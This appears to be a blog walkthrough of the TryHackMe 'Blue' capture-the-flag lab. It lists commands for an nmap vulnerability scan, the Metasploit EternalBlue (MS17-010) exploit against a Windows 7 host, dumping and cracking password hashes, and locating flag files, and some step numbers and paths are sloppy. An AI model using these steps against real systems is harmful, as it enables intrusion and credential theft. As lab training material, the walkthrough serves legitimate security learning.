Blue try hack me walkthrough | THM

 BLUE TRY HACK ME 





WELCOME TO TAMILCODE

 HERE IS TRICKS AND TECHNOLOGY





So in this website, we going to see about walkthrough or writeup for the blue try hack me machine and we going to take over the flag1, flag 2,flag3. so let get started.



So first turn on your try hack me VPN using the below command 


STEP 1: sudo openvpn filename.ovpn


Now your VPN will be started and note your IP from the try hack me website.



Next, we took the Nmap scan using the below command 


STEP 2: nmap -sC -sV 10.10.133.154 --script vuln



The result is shown below 



By seeing the above result I have found there is a remote code execution vulnerability and it is a windows 7 machine. we can able to spread the ransomware on machines.


You can able study remote code execution vulnerabilities on the below website.




Coming back to over topic. so their remote code execution.


And there is an exploit name which is ms17-010 show in the Nmap result.


So now open the Metasploit using msfconsole.



And search the exploit using the below command


STEP 3: search ms17-010


Now you can able to find the external blue vulnerability shown in the below image





So next use this exploit (see the below command)



STEP 4: use exploit/windows/smb/ms17_010_eternalblue




Next set the RHOST and LHOST using the below command 


STEP 5: set RHOST 10.10.133.154


RHOST ----> remote host 

you want to set the machine IP here 


STEP 6: set LHOST tun0


LHOST ----> localhost 


you want to set the localhost there which is your tun0 IP




STEP 7: run 


Now type the run command and you will get the shell.




After getting the shell go back to the directory using the cd .. command

 
TASK 4 CRACKING 


STEP 10: hashdump


Now you can able to get the password in the hash (shown below image)




So their user which is Jon and their hash you can able crack the hash in hashcat or crack station website 


Now you can able to crack the hash in this above website 



TASK 5 FINDING THE FAGS IN BLUE THM


Now you can able to see the flag1.txt shown in the below image.

Which is in the c drive 




Next, we going to take over the flag2.txt.




STEP 9:  cd /windows/sytem32/config 


STEP 10: ls 


you can able to get the flag2.txt 



Next, we going to take over the flag3.txt.


STEP 11: cd /user/jon/Document/


STEP 12: ls


Now you can able to take over the flag3.txt shown in the below image. 




I hope you will understand this article please subscribe my website and please support us by donating using the below link










Post a Comment

Previous Post Next Post